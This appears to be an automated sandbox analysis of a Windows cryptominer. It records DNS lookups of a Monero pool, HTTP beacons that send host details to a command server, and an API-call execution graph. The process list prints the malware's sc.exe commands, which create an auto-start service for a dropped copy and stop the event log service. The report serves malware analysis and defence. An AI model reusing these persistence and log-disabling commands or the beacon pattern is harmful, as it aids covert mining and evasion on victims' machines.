                                        Aug 5, 2024 06:01:59.170763016 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:59.170871973 CEST4940280192.168.2.6185.196.9.187
                                        Aug 5, 2024 06:01:59.175729036 CEST8049402185.196.9.187192.168.2.6
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 5, 2024 05:57:56.507702112 CEST4993153192.168.2.61.1.1.1
                                        Aug 5, 2024 05:57:56.514743090 CEST53499311.1.1.1192.168.2.6
                                        Aug 5, 2024 05:58:17.205755949 CEST53584381.1.1.1192.168.2.6
                                        Aug 5, 2024 05:58:18.691248894 CEST53638851.1.1.1192.168.2.6
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Aug 5, 2024 05:57:56.507702112 CEST192.168.2.61.1.1.10xb216Standard query (0)gulf.moneroocean.streamA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Aug 5, 2024 05:57:56.514743090 CEST1.1.1.1192.168.2.60xb216No error (0)gulf.moneroocean.streammonerooceans.streamCNAME (Canonical name)IN (0x0001)false
                                        Aug 5, 2024 05:57:56.514743090 CEST1.1.1.1192.168.2.60xb216No error (0)monerooceans.stream149.102.143.109A (IP address)IN (0x0001)false
                                        • 185.196.9.187
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649711185.196.9.187803052C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 5, 2024 05:57:57.589481115 CEST173OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 487
                                        Content-Type: application/json
                                        Host: 185.196.9.187
                                        User-Agent: cpp-httplib/0.12.6
                                        Aug 5, 2024 05:57:57.594551086 CEST487OUTData Raw: 7b 22 69 64 22 3a 22 6b 6d 6b 6a 75 6a 65 66 77 6f 78 6f 65 73 62 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 36 35 39 36 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 39 56 5f 46 52 4d
                                        Data Ascii: {"id":"kmkjujefwoxoesbh","computername":"965969","username":"SYSTEM","gpu":"9V_FRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                        Aug 5, 2024 05:57:58.301498890 CEST184INHTTP/1.1 200 OK
                                        Date: Mon, 05 Aug 2024 03:57:58 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 17
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                        Data Ascii: {"response":"ok"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649393185.196.9.187803052C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 5, 2024 05:58:56.620807886 CEST173OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 502
                                        Content-Type: application/json
                                        Host: 185.196.9.187
                                        User-Agent: cpp-httplib/0.12.6
                                        Aug 5, 2024 05:58:56.625742912 CEST502OUTData Raw: 7b 22 69 64 22 3a 22 6b 6d 6b 6a 75 6a 65 66 77 6f 78 6f 65 73 62 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 36 35 39 36 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 39 56 5f 46 52 4d
                                        Data Ascii: {"id":"kmkjujefwoxoesbh","computername":"965969","username":"SYSTEM","gpu":"9V_FRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                        Aug 5, 2024 05:58:57.305988073 CEST168INHTTP/1.1 200 OK
                                        Date: Mon, 05 Aug 2024 03:58:57 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 2
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 7b 7d
                                        Data Ascii: {}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.649397185.196.9.187803052C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 5, 2024 05:59:57.042526960 CEST173OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 503
                                        Content-Type: application/json
                                        Host: 185.196.9.187
                                        User-Agent: cpp-httplib/0.12.6
                                        Aug 5, 2024 05:59:57.047413111 CEST503OUTData Raw: 7b 22 69 64 22 3a 22 6b 6d 6b 6a 75 6a 65 66 77 6f 78 6f 65 73 62 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 36 35 39 36 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 39 56 5f 46 52 4d
                                        Data Ascii: {"id":"kmkjujefwoxoesbh","computername":"965969","username":"SYSTEM","gpu":"9V_FRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                        Aug 5, 2024 05:59:57.727946043 CEST168INHTTP/1.1 200 OK
                                        Date: Mon, 05 Aug 2024 03:59:57 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 2
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 7b 7d
                                        Data Ascii: {}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.649400185.196.9.187803052C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 5, 2024 06:00:58.553913116 CEST173OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 503
                                        Content-Type: application/json
                                        Host: 185.196.9.187
                                        User-Agent: cpp-httplib/0.12.6
                                        Aug 5, 2024 06:00:58.558706999 CEST503OUTData Raw: 7b 22 69 64 22 3a 22 6b 6d 6b 6a 75 6a 65 66 77 6f 78 6f 65 73 62 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 36 35 39 36 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 39 56 5f 46 52 4d
                                        Data Ascii: {"id":"kmkjujefwoxoesbh","computername":"965969","username":"SYSTEM","gpu":"9V_FRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                        Aug 5, 2024 06:00:59.257841110 CEST168INHTTP/1.1 200 OK
                                        Date: Mon, 05 Aug 2024 04:00:59 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 2
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 7b 7d
                                        Data Ascii: {}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.649402185.196.9.187803052C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 5, 2024 06:01:58.466027021 CEST173OUTPOST /api/endpoint.php HTTP/1.1
                                        Accept: */*
                                        Connection: close
                                        Content-Length: 503
                                        Content-Type: application/json
                                        Host: 185.196.9.187
                                        User-Agent: cpp-httplib/0.12.6
                                        Aug 5, 2024 06:01:58.470913887 CEST503OUTData Raw: 7b 22 69 64 22 3a 22 6b 6d 6b 6a 75 6a 65 66 77 6f 78 6f 65 73 62 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 39 36 35 39 36 39 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 39 56 5f 46 52 4d
                                        Data Ascii: {"id":"kmkjujefwoxoesbh","computername":"965969","username":"SYSTEM","gpu":"9V_FRM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                        Aug 5, 2024 06:01:59.170624971 CEST168INHTTP/1.1 200 OK
                                        Date: Mon, 05 Aug 2024 04:01:59 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Content-Length: 2
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 7b 7d
                                        Data Ascii: {}


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:1
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Users\user\Desktop\MenSncKnTI.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\MenSncKnTI.exe"
                                        Imagebase:0x7ff647750000
                                        File size:5'219'328 bytes
                                        MD5 hash:EB7EB5ACECB06DEAB2B4FCE875D6C079
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe delete "CWRWVXLO"
                                        Imagebase:0x7ff750c70000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe create "CWRWVXLO" binpath= "C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe" start= "auto"
                                        Imagebase:0x7ff750c70000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                        Imagebase:0x7ff750c70000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe start "CWRWVXLO"
                                        Imagebase:0x7ff750c70000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:23:57:54
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:23:57:55
                                        Start date:04/08/2024
                                        Path:C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\ProgramData\uyrlkcqvoccj\gtgpwwjkduow.exe
                                        Imagebase:0x7ff62ae80000
                                        File size:5'219'328 bytes
                                        MD5 hash:EB7EB5ACECB06DEAB2B4FCE875D6C079
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 79%, ReversingLabs
                                        • Detection: 61%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:11
                                        Start time:23:57:55
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:12
                                        Start time:23:57:55
                                        Start date:04/08/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:explorer.exe
                                        Imagebase:0x7ff609140000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4545941393.0000000001430000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4545941393.0000000001360000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4545941393.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4545941393.0000000001442000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.4545941393.0000000001369000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:17
                                        Start time:23:58:41
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                        Imagebase:0x7ff7403e0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Reset < >
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.2098267488.00007FF647751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF647750000, based on PE: true
                                          • Associated: 00000001.00000002.2098229699.00007FF647750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2098287783.00007FF647759000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2098372990.00007FF64775B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2098396407.00007FF64775C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2099685728.00007FF647C4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2099749257.00007FF647C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.2099796405.00007FF647C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff647750000_MenSncKnTI.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 148bc54084fd0555b90557d8aca2c4c7d702f0134a9b5dfb6096d90e54c66531
                                          • Instruction ID: 98bd4188480fdbc3d7dbac2e48cc71d40fa605530c52befaf41c320e6d7f3ba9
                                          • Opcode Fuzzy Hash: 148bc54084fd0555b90557d8aca2c4c7d702f0134a9b5dfb6096d90e54c66531
                                          • Instruction Fuzzy Hash: 20B0922090824AC4E6003B11E84129922606B08781F800820C80C42B52CE6E50408B14
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2104158383.00007FF62AE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62AE80000, based on PE: true
                                          • Associated: 0000000A.00000002.2104133456.00007FF62AE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104183061.00007FF62AE89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104202998.00007FF62AE8B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104431830.00007FF62B104000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104655091.00007FF62B37A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104675807.00007FF62B37C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 0000000A.00000002.2104700313.00007FF62B37F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_7ff62ae80000_gtgpwwjkduow.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 148bc54084fd0555b90557d8aca2c4c7d702f0134a9b5dfb6096d90e54c66531
                                          • Instruction ID: fb972ef1797167473f0048a9e170aad43c6bd43c7f1c2c802c399e8c664d50c1
                                          • Opcode Fuzzy Hash: 148bc54084fd0555b90557d8aca2c4c7d702f0134a9b5dfb6096d90e54c66531
                                          • Instruction Fuzzy Hash: A5B09220D042098CEB013B819C4125822606B18BC0F500060C44C43362CEAD50429B12

                                          Execution Graph

                                          Execution Coverage:2.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:13.5%
                                          Total number of Nodes:896
                                          Total number of Limit Nodes:2
                                          execution_graph 2979 140001ac3 2980 140001a70 2979->2980 2981 140001b36 2980->2981 2982 14000199e 2980->2982 2985 140001b53 2980->2985 2983 140001ba0 4 API calls 2981->2983 2984 140001a0f 2982->2984 2986 1400019e9 VirtualProtect 2982->2986 2983->2985 2986->2982 2084 140001ae4 2086 140001a70 2084->2086 2085 140001b36 2092 140001ba0 2085->2092 2086->2085 2087 14000199e 2086->2087 2090 140001b53 2086->2090 2089 140001a0f 2087->2089 2091 1400019e9 VirtualProtect 2087->2091 2091->2087 2093 140001bc2 2092->2093 2095 140001c45 VirtualQuery 2093->2095 2096 140001cf4 2093->2096 2099 140001c04 memcpy 2093->2099 2095->2096 2101 140001c72 2095->2101 2097 140001d23 GetLastError 2096->2097 2098 140001d37 2097->2098 2099->2090 2100 140001ca4 VirtualProtect 2100->2097 2100->2099 2101->2099 2101->2100 2129 140001404 2202 140001394 2129->2202 2131 140001413 2132 140001394 2 API calls 2131->2132 2133 140001422 2132->2133 2134 140001394 2 API calls 2133->2134 2135 140001431 2134->2135 2136 140001394 2 API calls 2135->2136 2137 140001440 2136->2137 2138 140001394 2 API calls 2137->2138 2139 14000144f 2138->2139 2140 140001394 2 API calls 2139->2140 2141 14000145e 2140->2141 2142 140001394 2 API calls 2141->2142 2143 14000146d 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000147c 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000148b 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000149a 2148->2149 2150 140001394 2 API calls 2149->2150 2151 1400014a9 2150->2151 2152 140001394 2 API calls 2151->2152 2153 1400014b8 2152->2153 2154 140001394 2 API calls 2153->2154 2155 1400014c7 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014d6 2156->2157 2158 1400014e5 2157->2158 2159 140001394 2 API calls 2157->2159 2160 140001394 2 API calls 2158->2160 2159->2158 2161 1400014ef 2160->2161 2162 1400014f4 2161->2162 2163 140001394 2 API calls 2161->2163 2164 140001394 2 API calls 2162->2164 2163->2162 2165 1400014fe 2164->2165 2166 140001503 2165->2166 2167 140001394 2 API calls 2165->2167 2168 140001394 2 API calls 2166->2168 2167->2166 2169 14000150d 2168->2169 2170 140001394 2 API calls 2169->2170 2171 140001512 2170->2171 2172 140001394 2 API calls 2171->2172 2173 140001521 2172->2173 2174 140001394 2 API calls 2173->2174 2175 140001530 2174->2175 2176 140001394 2 API calls 2175->2176 2177 14000153f 2176->2177 2178 140001394 2 API calls 2177->2178 2179 14000154e 2178->2179 2180 140001394 2 API calls 2179->2180 2181 14000155d 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000156c 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000157b 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000158a 2186->2187 2188 140001394 2 API calls 2187->2188 2189 140001599 2188->2189 2190 140001394 2 API calls 2189->2190 2191 1400015a8 2190->2191 2192 140001394 2 API calls 2191->2192 2193 1400015b7 2192->2193 2194 140001394 2 API calls 2193->2194 2195 1400015c6 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015d5 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015e4 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015f3 2200->2201 2203 1400063b0 malloc 2202->2203 2204 1400013b8 2203->2204 2205 1400013c6 NtUnloadKey 2204->2205 2205->2131 2206 140002104 2207 140002111 EnterCriticalSection 2206->2207 2211 140002218 2206->2211 2209 14000220b LeaveCriticalSection 2207->2209 2214 14000212e 2207->2214 2208 140002272 2209->2211 2210 140002241 DeleteCriticalSection 2210->2208 2211->2208 2211->2210 2213 140002230 free 2211->2213 2212 14000214d TlsGetValue GetLastError 2212->2214 2213->2210 2213->2213 2214->2209 2214->2212 2102 140001e65 2103 140001e67 signal 2102->2103 2104 140001e7c 2103->2104 2106 140001e99 2103->2106 2105 140001e82 signal 2104->2105 2104->2106 2105->2106 2987 140001f47 2988 140001e67 signal 2987->2988 2989 140001e99 2987->2989 2988->2989 2990 140001e7c 2988->2990 2990->2989 2991 140001e82 signal 2990->2991 2991->2989 2107 14000216f 2108 140002185 2107->2108 2109 140002178 InitializeCriticalSection 2107->2109 2109->2108 2110 140001a70 2111 14000199e 2110->2111 2115 140001a7d 2110->2115 2112 140001a0f 2111->2112 2113 1400019e9 VirtualProtect 2111->2113 2113->2111 2114 140001b53 2115->2110 2115->2114 2116 140001b36 2115->2116 2117 140001ba0 4 API calls 2116->2117 2117->2114 2215 140001e10 2216 140001e2f 2215->2216 2217 140001ecc 2216->2217 2221 140001eb5 2216->2221 2222 140001e55 2216->2222 2218 140001ed3 signal 2217->2218 2217->2221 2219 140001ee4 2218->2219 2218->2221 2220 140001eea signal 2219->2220 2219->2221 2220->2221 2222->2221 2223 140001f12 signal 2222->2223 2223->2221 2992 140002050 2993 14000205e EnterCriticalSection 2992->2993 2994 1400020cf 2992->2994 2995 1400020c2 LeaveCriticalSection 2993->2995 2996 140002079 2993->2996 2995->2994 2996->2995 2997 1400020bd free 2996->2997 2997->2995 2998 140001fd0 2999 140001fe4 2998->2999 3000 140002033 2998->3000 2999->3000 3001 140001ffd EnterCriticalSection LeaveCriticalSection 2999->3001 3001->3000 2232 140001ab3 2233 140001a70 2232->2233 2233->2232 2234 140001b53 2233->2234 2235 140001b36 2233->2235 2238 14000199e 2233->2238 2236 140001ba0 4 API calls 2235->2236 2236->2234 2237 140001a0f 2238->2237 2239 1400019e9 VirtualProtect 2238->2239 2239->2238 2074 140001394 2078 1400063b0 2074->2078 2076 1400013b8 2077 1400013c6 NtUnloadKey 2076->2077 2079 1400063ce 2078->2079 2082 1400063fb 2078->2082 2079->2076 2080 1400064a3 2081 1400064bf malloc 2080->2081 2083 1400064e0 2081->2083 2082->2079 2082->2080 2083->2079 2224 14000219e 2225 140002272 2224->2225 2226 1400021ab EnterCriticalSection 2224->2226 2227 140002265 LeaveCriticalSection 2226->2227 2229 1400021c8 2226->2229 2227->2225 2228 1400021e9 TlsGetValue GetLastError 2228->2229 2229->2227 2229->2228 2118 140001800 2119 140001812 2118->2119 2120 140001835 fprintf 2119->2120 2121 140001000 2122 14000108b __set_app_type 2121->2122 2123 140001040 2121->2123 2125 1400010b6 2122->2125 2123->2122 2124 1400010e5 2125->2124 2127 140001e00 2125->2127 2128 140006950 __setusermatherr 2127->2128 2230 140002320 strlen 2231 140002337 2230->2231 2240 140001140 2243 140001160 2240->2243 2242 140001156 2244 1400011b9 2243->2244 2245 14000118b 2243->2245 2246 1400011d3 2244->2246 2247 1400011c7 _amsg_exit 2244->2247 2245->2244 2248 1400011a0 Sleep 2245->2248 2249 140001201 _initterm 2246->2249 2250 14000121a 2246->2250 2247->2246 2248->2244 2248->2245 2249->2250 2266 140001880 2250->2266 2253 14000126a 2254 14000126f malloc 2253->2254 2255 14000128b 2254->2255 2256 1400012d0 2254->2256 2257 1400012a0 strlen malloc memcpy 2255->2257 2277 140003240 2256->2277 2257->2256 2257->2257 2259 140001315 2260 140001344 2259->2260 2261 140001324 2259->2261 2264 140001160 75 API calls 2260->2264 2262 140001338 2261->2262 2263 14000132d _cexit 2261->2263 2262->2242 2263->2262 2265 140001366 2264->2265 2265->2242 2267 140001247 SetUnhandledExceptionFilter 2266->2267 2268 1400018a2 2266->2268 2267->2253 2268->2267 2269 14000194d 2268->2269 2273 140001a20 2268->2273 2270 14000199e 2269->2270 2271 140001ba0 4 API calls 2269->2271 2270->2267 2272 1400019e9 VirtualProtect 2270->2272 2271->2269 2272->2270 2273->2270 2274 140001b53 2273->2274 2275 140001b36 2273->2275 2276 140001ba0 4 API calls 2275->2276 2276->2274 2280 140003256 2277->2280 2278 140003371 wcslen 2386 14000153f 2278->2386 2280->2278 2282 14000356e 2282->2259 2285 14000346c 2288 140003492 memset 2285->2288 2290 1400034c4 2288->2290 2291 140003514 wcslen 2290->2291 2292 14000352a 2291->2292 2296 14000356c 2291->2296 2293 140003540 _wcsnicmp 2292->2293 2294 140003556 wcslen 2293->2294 2293->2296 2294->2293 2294->2296 2295 140003631 wcscpy wcscat memset 2298 140003670 2295->2298 2296->2295 2297 1400036b3 wcscpy wcscat memset 2299 1400036f6 2297->2299 2298->2297 2300 1400037fe wcscpy wcscat memset 2299->2300 2301 140003840 2300->2301 2302 140003b92 wcslen 2301->2302 2303 140003ba0 2302->2303 2307 140003bdb 2302->2307 2304 140003bb0 _wcsnicmp 2303->2304 2305 140003bc6 wcslen 2304->2305 2304->2307 2305->2304 2305->2307 2306 140003cea wcscpy wcscat memset 2308 140003d2c 2306->2308 2307->2306 2309 140003d6f wcscpy wcscat memset 2308->2309 2311 140003db5 2309->2311 2310 140003de5 wcscpy wcscat 2312 140005f96 memcpy 2310->2312 2313 140003e17 2310->2313 2311->2310 2312->2313 2314 140003f6a wcslen 2313->2314 2316 140003faf 2314->2316 2315 140004014 wcslen memset 2526 14000157b 2315->2526 2316->2315 2318 1400046a3 memset 2319 1400046d9 2318->2319 2320 14000471e wcscpy wcscat wcslen 2319->2320 2567 14000146d 2320->2567 2324 14000468d 2325 14000145e 2 API calls 2324->2325 2328 140004688 2325->2328 2326 1400048bd 2333 1400048fa memset 2326->2333 2327 14000157b 2 API calls 2359 14000413d 2327->2359 2328->2318 2331 1400048db 2338 14000145e 2 API calls 2331->2338 2332 14000482e 2653 1400014a9 2332->2653 2336 140006077 2333->2336 2337 14000491e wcscpy wcscat wcslen 2333->2337 2370 140004a50 2337->2370 2338->2326 2341 1400048cb 2346 14000145e 2 API calls 2341->2346 2342 14000145e 2 API calls 2342->2359 2344 1400044b8 